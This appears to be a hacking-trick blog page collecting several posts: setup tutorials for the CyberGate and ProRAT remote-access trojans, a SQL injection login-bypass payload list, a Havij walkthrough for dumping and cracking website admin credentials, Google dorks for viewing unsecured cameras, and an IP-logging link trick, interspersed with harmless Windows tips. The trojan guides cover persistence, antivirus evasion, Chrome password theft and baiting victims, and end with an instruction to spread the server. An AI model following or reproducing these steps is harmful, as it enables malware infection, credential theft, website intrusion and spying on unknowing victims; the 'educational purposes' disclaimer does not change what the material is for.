Latest News

Showing posts with label Trick. Show all posts
Showing posts with label Trick. Show all posts

Facebook Auto Mention / Tag Tool

" Facebook Auto Mention / TagTool " ;

This script automatically mention all your friends in a post ! i tested this script a profile with 4K+ friends and i dont get blocked
^_^  This is The Script and all you need is copy all contents to Your Console [right click on anywhere on chrome browser, click inspect element and find console at last tab , ] and hit enter ! after that put the post id into the Dialogbox , and yes ! it's done ! it may take up to 1 minuets depended to your Friend List and internet Speed

---------------------------------------------------------knox d3cryptor/Team 73cyf

N3w dork list

There Is Some Of Dork which help to get information & secret INFO With Google ....

Cybergate RAT Tutorial For Beginners

1) What is a R.A.T?
R.A.T is remote administration tool. In other words, if a RAT is set up correctly, then a person (hacker) would gain acces on victim's computer. That hacker can do any stuff in victim's pc.
For example: a)will be able to move his mouse and keyboards
b)will be able to see your victim by hacking his webcam and etc.

2) Which is the best RAT?
I dont use many RATs. The best that i ever used is Cybergate RAT

So now, lets get started.
First of all you guys download this:

Cybergate Download Link(click here to download)

this download link was not made by me.download and use it at your own risk
this application is called cybergate and it will used to create rat server.
this app might be detected as virus by some antivirus.but dont worry it is not backdoored.

download it and extract it to a folder.

==============================================================
Secondly set up the no-ip client

to do that you must go to :
NO-IP SITE(click here)

register there.

once you have logged in, you must "add a host"

Image has been scaled down 36% (758x329). Click this bar to view original image (1174x509). Click image to open in new window.

[Image: 1.jpg]



Now type in your name at hostname.and choose any domain. you dont have to follow the same name like in the picture below.
[Image: 2.jpg]


now you can see that you have successfully created a host.
now download the no-ip duc client that is available at that site.

Image has been scaled down 16% (758x273). Click this bar to view original image (902x324). Click image to open in new window.
[Image: 3.jpg]


click the windows version.

once done downloading, run the program. sign in using your no-ip username and password.
and press select host and you can see your host there. click at the box and press save .


===========================================================
now its time to set up your cybergate RAT seRVER
LETS CONTINUE

run the cybergate rat that you have extracted into a folder.
there will be agreement which you got to wait for a few seconds before agreeing.

next: Control center-->start


now a box would appear.you have type in 100 and press the go image button.
and type in the connection password as 123456
and click save

Image has been scaled down 26% (758x344). Click this bar to view original image (1012x458). Click image to open in new window.
[Image: 8.jpg]


now press: control center--->builder--->create server

Image has been scaled down 25% (758x345). Click this bar to view original image (1009x459). Click image to open in new window.
[Image: 9.jpg]



now a box would appear.
click new
press the name of the new user and ok

Image has been scaled down 25% (758x344). Click this bar to view original image (1009x457). Click image to open in new window.
[Image: 10.jpg]


now double click the new user.

Image has been scaled down 25% (758x342). Click this bar to view original image (1009x455). Click image to open in new window.
[Image: 11.jpg]

after that you will the connection tab.
view the picture for better understanding.

if you want to test the server on yourself or same lan networkk, then you have to edit the 127.0.0.1:999 to 127.0.0.1:100
if you want to test on others, then add:
yourhost.no-ip.info:100

Image has been scaled down 25% (758x346). Click this bar to view original image (1010x460). Click image to open in new window.
[Image: 12.jpg]

change the identification to cyber and password to 123456

Image has been scaled down 26% (758x344). Click this bar to view original image (1011x458). Click image to open in new window.
[Image: 13.jpg]


now press the installation tab and use the same setting as mine.
Install directory is the where the server installs
%System%
%Windows%
%Root%
%Program Files%
%Other%
it is more better to use "system"
Boot: this will be the startup option. check everything and press random 5 times so that the server will start everytime your victim start the computer
Directory is the place where the server will be situated
File Name will be the name of the server in the directory
change the creation date
persistence will inject the server into the victim,s pc until success
for inject into just use default browser
dont choose hide file because it will make your server detectable by all antivirus

Image has been scaled down 25% (758x345). Click this bar to view original image (1008x458). Click image to open in new window.
[Image: 14.jpg]


go to anti debug tab and check all

Image has been scaled down 25% (758x343). Click this bar to view original image (1010x456). Click image to open in new window.
[Image: 15.jpg]

and then go to create server tab
check use icon,delayed execution, and google chrome password
delayed execution will be the time taken for the server to inject into victim's pc .
google chrome password will help you to steal google chrome passwords.
a pop up will appear and just press ok

Image has been scaled down 25% (758x344). Click this bar to view original image (1008x457). Click image to open in new window.
[Image: 16.jpg]

now you have done setting up your server.
===================================================================
PortForwarding
Q: So, what is portforwarding?
A:Port forwarding allows remote computers, for example, computers on the Internet, to connect to a specific computer or service within a private local area network (LAN)
so lets start portforwarding.

remember that your the port that you have choosen is 100.
to make it easier.lets download the simpleportforward tool from this site:

SIMPLE PORT FORWARDING(click here)

from here pc wintech TuT starts ., all credits of port forwarding goes to Pc win tech.com
now, once it is downloaded,run the program.

1)firstly update your router list and set your router.

Image has been scaled down 38% (758x341). Click this bar to view original image (1216x547). Click image to open in new window.
[Image: 18.jpg]

and press the "choose which port you need to forward" by pressing the "do it now"
and press the "add custom"
type
name:anything
type: tcp/udp
start port:99
end port:100
and then press "add"

now click "update router"
[Image: 20.jpg]

when you have pressed update router, you can see the program accessing your router and editing whatever you have typed just now.
and now the last step, which is to check whether your port 100 is open or not.
but before that close your cybergate program.
and now do like in the below picture

Image has been scaled down 9% (758x551). Click this bar to view original image (829x602). Click image to open in new window.
[Image: 22.jpg]


if the portforwarding is failed, then you have to start from the beginning of portforwarding
======================================================================
now,you have done it.
what you have to do now is spread your server.
good luck

---------------------------------------------------------knox d3cryptor/Team 73cyf

Hidden secrets Of windows explorer



cheat sheet for admin page bypass [sql injection]

strings ::

' or '1'='1
' or 'x'='x
' or 0=0 --
" or 0=0 --
= 'or' 1=1
or 0=0 --
' or 0=0 #
" or 0=0 #
or 0=0 #
' or 'x'='x
" or "x"="x
') or ('x'='x
' or 1=1--
" or 1=1--
or 1=1--
' or a=a--
" or "a"="a
') or ('a'='a
") or ("a"="a
hi" or "a"="a
hi" or 1=1 --
hi' or 1=1 --
'or'1=1'
==
and 1=1--
and 1=1
' or 'one'='one--
' or 'one'='one
' and 'one'='one
' and 'one'='one--
1') and '1'='1--
admin' --
admin' #
admin'/*
or 1=1--
or 1=1#
or 1=1/*
) or '1'='1--
) or ('1'='1--
' or '1'='1
' or 'x'='x
' or 0=0 --
" or 0=0 --
or 0=0 --
' or 0=0 #
" or 0=0 #
or 0=0 #
' or 'x'='x
" or "x"="x
') or ('x'='x
' or 1=1--
" or 1=1--
or 1=1--
' or a=a--
" or "a"="a
') or ('a'='a
") or ("a"="a
hi" or "a"="a
hi" or 1=1 --
hi' or 1=1 --
'or'1=1'
or 1=1
or 1=1--
or 1=1#
or 1=1/*
admin' --
admin' #
admin'/*
admin' or '1'='1
admin' or '1'='1'--
admin' or '1'='1'#
admin' or '1'='1'/*
admin'or 1=1 or ''='
admin' or 1=1
admin' or 1=1--
admin' or 1=1#
admin' or 1=1/*
admin') or ('1'='1
admin') or ('1'='1'--
admin') or ('1'='1'#
admin') or ('1'='1'/*
admin') or '1'='1
admin') or '1'='1'--
admin') or '1'='1'#
admin') or '1'='1'/*
1234 ' AND 1=0 UNION ALL SELECT 'admin', '81dc9bdb52d04dc20036dbd8313ed055

How to hack an IP addess of a remote computer


What can you do with an IP address?
Well you can hack a computer using it's IP address.
You can find the location of the computer using its IP address.

Things required:
1)  PHP script to catch the IP.
2) .txt file to store the IP.
you can download them from here.

Procedure:
Step 1: First create an account in any free webhosting site.
          examples are www.110mb.com
                              www.drivehq.com
                              www.t35.com
                              www.my3gb.com
Step 2: Extract the IP finder script you have downloaded.
Step 3: Now Upload the files onto the free web hosting site.
Step 4:Give the link of ip.php script to your friend.

When he clicks the link, his IP address will be strored in the ip_log.txt file.

DEMONSTRATION:

Here i have uploaded my scripts on to www.my3gb.com


and i clicked the ip.php link.
Now my IP address is stored in the ip_log.txt file

You can check out this with www.showmyip.com
Finding the location of the computer:
Now pick the IP address you got from the victim and open www.ip2location.com
here enter the IP address in the box and click "find location".
Thats it..

ProRAT [Trojan ] [TuT]



Hi guys..today i am going to show you how to set up ProRat and how to hack a computer using it. Well, i am going to finish up RAT setup articles with this. I will give the counter measures in my next article. As i haven’t written any articles on direct connection Trojans, I decided to write the one on PRORAT.

procedure to setup ProRat

STEP 1. First of all Download ProRat from here. Once it is downloaded extract it. A password prompt will come up. Enter the password.The password  "pro".

STEP 2. Open up the program and You should see the following window.



STEP 3. Click on the "Create" button in the bottom. Choose "Create ProRat Server".


STEP 4. Next put your IP address so the server could connect to you. You need not enter your IP address manually, you can do this by just clicking on the little arrow. it automatically fills your IP address.
Next put in your e-mail so that when and if a victim gets infected it will send you an email.


STEP 5. Now Open General settings. This tab is the most important tab. In the check boxes, we will choose the server port the program will connect through, the password you will be asked to enter when the victim is infected and you wish to connect with them, and the victim name. As you can see ProRat has the ability to disable the windows firewall and hide itself from being displayed in the task manager. Just follow the steps as shown in the figure.


STEP  6. Click on the Bind with File button to continue. Here you will have the option to bind the trojan server file with another file. You can select an image, text file or pdf file, So as to make the victim trust your file.


STEP  7. Click on the Server Extensions button to continue. Here you choose what kind of server file to generate.    I prefer using .exe files.


STEP  8. Click on Server Icon to continue. Here you will choose an icon for your server file to have. The icons help mask what the file actually is.


STEP  9. After this, press Create server, your server will be in the same folder as ProRat. Start giving this file to your victim. When the victim double click the file, his computer will be in your control.


STEP  10. Now the hacker has lot of options to choose from. He can do many funny things with the victim’s computer.



NOTE: In this tutorial, i put the victim’s IP as 127.0.0.1 as i am testing it on my computer. Inorder to hack a remote computer, you need to get the IP address of your victim. If you dont  know how to find an IP address, you can read my article on finding out remote IP address from here

Save Battery Life by Hacking the OLED Display [Android]

Here is a cool hack that will help you save your battery on Android phones like Google Nexus One and Samsung Galaxy that come with OLED display. Darker colors especially red colors on OLED displays consume less power. Here is a video to know how to perform this hack.

NO side effects :P

How To Hide Any Drive Through Command Prompt [windows Trick]


 

Have you ever thought of hiding any drive from your system so that no one can knew about it. You may have heard or even used a lot of software’s that might be able to do that, but if you are GEEK like me and want to do things by your own without using any 3rd party software than this tutorial will show you how you can do it.
Well there are 3 ways of doing it, in this tutorial we are covering command prompt way of doing it.



Here is how to do it:


Step 1. Open command Prompt, go to Start Menu > All Programs >Accessories > Command prompt
Step 2. In the Command Prompt, type Diskpart and hit enter key. If UAC (User Account Control), dialog-box prompts than click Yes.
Step 3. Then type List Volume and press enter, this will produce the list of all drives.

Step 4. Now select the drive which you want to hide, you can either do this by typing Select Volume 1 (i.e. Volume Number) or by typingSelect Volume C(i.e. Drive letter

Step 5. To hide a drive, type Remove Letter C. Here, C is the drive letter than you want to hide. You can use any drive letter you want.

Step 6. That’s it. You are done! C drive is now hidden



How to unhide hidden drive


Step 1. Follow the procedure mentioned in step 1, 2, 3 and 4.
Step 2. To show the hidden drive type Assign Letter C and hit enter, now you can view C: drive in explorer.


That’s it. This is one way of hiding and un-hiding drives from explorer, for rest two stay tuned.

How To Hack Into Live Cameras Around The World

This simple technique is called “Google Hacking”. We are just looking for unsecured. cameras around the world and writing a simplestring on google hack into them.

Follow the steps below:
1) Choose any of these strings to enter on google

* inurl:”CgiStart?page=”
* inurl:/view.shtml
intitle:”Live View / – AXIS
* inurl:view/view.shtml
* inurl:ViewerFrame?Mode=
* inurl:ViewerFrame?Mode=Refresh
* inurl:axis-cgi/jpg
* inurl:axis-cgi/mjpg (motion-JPEG) (disconnected)
* inurl:view/indexFrame.shtml
* inurl:view/index.shtml
* inurl:view/view.shtml
* liveapplet
* intitle:”live view” intitle:axis
* intitle:liveapplet
allintitle:”Network Camera NetworkCamera” (disconnected)
* intitle:axis intitle:”video server”
* intitle:liveapplet inurl:LvAppl
* intitle:”EvoCam” inurl:”webcam.html”
* intitle:”Live NetSnap Cam-Server feed”
* intitle:”Live View / – AXIS”
* intitle:”Live View / – AXIS 206M”
* intitle:”Live View / – AXIS 206W”
* intitle:”Live View / – AXIS 210?
* inurl:indexFrame.shtml Axis
* inurl:”MultiCameraFrame?Mode=Motion” (disconnected)
* intitle:start inurl:cgistart
* intitle:”WJ-NT104 Main Page”
* intitle:snc-z20 inurl:home/
* intitle:snc-cs3 inurl:home/
* intitle:snc-rz30 inurl:home/
* intitle:”sony network camera snc-p1?
* intitle:”sony network camera snc-m1?
* site:.viewnetcam.com -www.viewnetcam.com
* intitle:”Toshiba Network Camera” user login
* intitle:”netcam live image” (disconnected)
* intitle:”i-Catcher Console – Web Monitor”

camera hacking
2)Once you have picked one, simply copy it, and paste in on google.
3)Now choose any result and you will be seeing a live camera.

Add Copy To / Move To on Windows [windows right click Trick]



There’s a registry hack for Windows that will let you add a Copy To Folder or Move To Folder to the right-click menu, which can be very useful when you want to move a file but don’t have the other folder open already.

Right-click on a file:
image
And up pops a nice dialog that you can use to easily drop a file into the right directory.
Install
Just download, unzip, and double-click on the registry files. You can choose to use the copy to, move to, or both.

Problem Steps Recorder [PSR] Windows TuT maker



Main purpose of Problem Steps Recorder is to send feedback to Microsoft’s developers, but you can use it also to create image tutorials for your computer . Problem Steps Recorder is to send tracking your mouse and keyboard input while taking screenshots that correspond with each new action and save it as HTML slide show. To lanuch this program type in start menu psr.exe


Hack Websites Using Havij [SQL Injection Tutorial]


According to a survey the most common technique of hacking a website is SQL Injection. SQL Injection is a technique in which hacker insert SQL codes into web Forum to get Sensitive Information like (User Name , Passwords) to access the site and Deface it. The traditional SQL injection method is quite difficult, but now a days there are many tools available online through which any script kiddie can use SQL Injection to deface a webite, because of these tools websites have became more vulnerable to these types of attacks.

One of the popular tools is Havij, Havij is an advanced SQL injection tool which makes SQL Injection very easy for you, Along with SQL injection it has a built in admin page finder which makes it very effective.

Supported Databases With Havij

  • MsSQL 2000/2005 with error.
  • MsSQL 2000/2005 no error union based
  • MySQL union based
  • MySQL Blind
  • MySQL error based
  • MySQL time based
  • Oracle union based
  • MsAccess union based
  • Sybase (ASE)
Things We Need:
  1. Havij Tool - (Search In Google And Download Cracked Version.)
  2.  SQLI Vulnerable Website. - Use Google Dorks To Search Vulnerable Website.
Start Tutorial.

  1. Open Havij.
  2. Type Vulnerable Website Inside It And Hit Analyze Button.

Havij Hacking Tutorial


  1. Now Click On Tables Tab And Then Hit Get DBs Button.

Havij Hacking Tutorial

  1. Now You Have Got All Databases In Result. Tick Databases And Hit Get Tables Button.

Havij Hacking Tutorial

  1. You Have Got Tables From The Databases You Ticked In Previous Step. Now Tick Related Tables And Hit Get Columns Button.

How To Hack Website


  1. You Have Got Columns From Ticked Table. Tick Related Columns And Press Get DataButton.
I Am Going To Choose Username, Password, UserGroup Columns. There Should Be Stored Data Related To Admin's Username, Password Etc.

Havij Hacking Tutorial


  1. Bingo! You Have Got Username And Password Of Admin.

Havij Hacking Tutorial


How To Crack Hash?


As You Can See, We Have Received All Information Of Admin. Like Username, Password And UserGroup. But We Have Received Password In The Shape Of Hash. In Order To See The Real Password. We Have To Crack This Code. For Cracking This Code. We Will Make Use Of Havij Tool Again. Follow Me To Crack This Hash.

  1. You Can See A Button Of MD5 In Buttons List Of Havij. Hit That Button And Paste Your Hash Code Inside It And Press Start Button.

Havij Hacking Tutorial


  1. You Can See Password In Plain Text In Result Now. See Picture Below.

Havij Hacking Tutorial

Find Admin Page


We Have Got Everything. Like Username, Password. But Where To Use Them And Get Admin Rights? You Need To Find The Admin Login Page Of Target Site. For Finding Admin Page Of Target Site. We Will Use Havij Again.
  1. In Buttons List, Press Find Admin Button. Type Homepage Url Of Target Site. Press Start Button.

Havij Hacking Tutorial

You Will Get Result Same Like Hash Cracking. You Will Be Able To See The Page. Which Admin Of Your Target Site Use To Login.

-------------------------------------------------------------------------------------------------------KNOXD3CrypT0r


Contact Us

24x7 online , we happy to answer you
tamilcypc@gmail.com

Disclaimer

This Blog and its TUT's are intended for educational purposes only, no-one involved in the creation of this TuT may be held responsible for any illegal acts brought about by this Blog or TuT.



Featured Post

Custom Domains And HTTPS Redirection Code